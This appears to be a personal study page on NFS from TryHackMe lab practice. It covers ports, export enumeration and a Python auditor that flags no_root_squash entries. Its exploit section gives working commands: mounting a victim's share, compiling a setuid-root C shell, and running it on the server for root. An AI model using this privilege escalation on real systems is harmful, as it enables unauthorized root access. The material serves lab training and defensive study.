
NFS: Notes


NFS - Network File System

To allow NFS traffic through a firewall, these ports need to be open:

  • NFS Daemon (NFSD): Runs on NFS servers and uses port 2049 for both TCP and UDP
  • Portmapper: Uses port 111 for both TCP and UDP
  • Mount daemon (mountd): Uses port 20048, which is specified in /etc/services

Show exports on a remote NFS server

# showmount -e 10.10.177.215
Export list for 10.10.177.215:
/opt/conf *
#

NFS exploit

Example of no_root_squash

[paradox@localhost tmp]$ cat /etc/exports
cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
[paradox@localhost tmp]$

Yet another example of no_root_squash

john@enterprize:~$ cat /etc/exports
cat /etc/exports
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
john@enterprize:~$
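
An added example (not from the original notes): a small Python check that parses exports(5)-style entries like the two above and reports no_root_squash, insecure, and read-write exports open to any host. The sample text is constructed from the entries shown on this page plus a hypothetical hardened entry (/srv/share, 192.0.2.10); quoted paths containing spaces are not handled.

```python
import re

# Risky option -> its safe opposite. root_squash and secure are the
# defaults documented in exports(5), so only the risky form needs flagging.
RISKY = {"no_root_squash": "root_squash", "insecure": "secure"}
TOKEN = re.compile(r"([^()]*)(?:\((.*)\))?")  # client, optional (opt,opt,...)

# Constructed sample: first two entries are the ones shown on this page,
# the third is a hypothetical hardened entry.
SAMPLE = """\
# sample exports file
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/var/nfs        localhost(insecure,rw,sync,no_root_squash,no_subtree_check)
/srv/share 192.0.2.10(rw,sync,root_squash,no_subtree_check)
"""

def audit_exports(text):
    """Return sorted (path, client, finding) tuples for risky export entries."""
    findings = set()
    # Join backslash-continued lines, then strip comments and blank lines.
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        defaults = set()
        for tok in tokens:
            if tok.startswith("-"):   # "-opt,opt" sets defaults for later clients
                defaults = set(tok[1:].split(","))
                continue
            m = TOKEN.fullmatch(tok)
            if not m:                 # malformed token, nothing to evaluate
                continue
            client = m.group(1) or "*"  # a bare "(opts)" applies to every host
            explicit = set(m.group(2).split(",")) if m.group(2) else set()
            for opt, opposite in RISKY.items():
                if opt in explicit or (opt in defaults and opposite not in explicit):
                    findings.add((path, client, opt))
            if client == "*" and "rw" in (explicit | defaults) and "ro" not in explicit:
                findings.add((path, client, "rw to any host"))
    return sorted(findings)

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE):
        print(f"{path}\t{client}\t{finding}")
```

Removing no_root_squash from an entry restores the default root_squash, which maps requests from remote uid 0 to the anonymous user.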

On the attack machine

# mkdir /tmp/nfs
# mount -o rw,vers=2 10.10.178.28:/tmp /tmp/nfs
mount: /tmp/nfs: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.

First mount failed

# mount -o rw,vers=2 10.10.79.232:/home/james /tmp/pe
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
#
# apt install nfs-common
# service rpcbind restart
# service statd start
# mount -o rw,vers=2 localhost:/home/james /tmp/nfs
mount.nfs: requested NFS version or transport protocol is not supported
apt install nfs-common nfs4-acl-tools
root@T420:/tmp/nfs# mount -o rw,vers=2 10.10.64.107:/var/nfs/general /tmp/nfs
mount.nfs: Protocol not supported
root@T420:/tmp/nfs# mount -o rw,vers=4 10.10.64.107:/var/nfs/general /tmp/nfs
root@T420:/tmp/nfs# ls /tmp/nfs
credentials.bak
root@T420:/tmp/nfs#
# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/nfs/x.c
# gcc /tmp/nfs/x.c -o /tmp/nfs/x
# chmod +s /tmp/nfs/x

On the NFS server (victim) machine

$ /tmp/x
#

References

NFS no_root_squash/no_all_squash misconfiguration PE

Network File System on Wikipedia

Practice

>>> THM | Network Services 2

>>> THM | Linux PrivEsc - Task 19 - NFS

>>> THM | Linux Priv Esc Arena - Task 19 - Privilege Escalation - NFS Root Squashing

>>> THM | Overpass 3 - Hosting

>>> THM | Enterprize

>>> THM | VulnNet: Internal
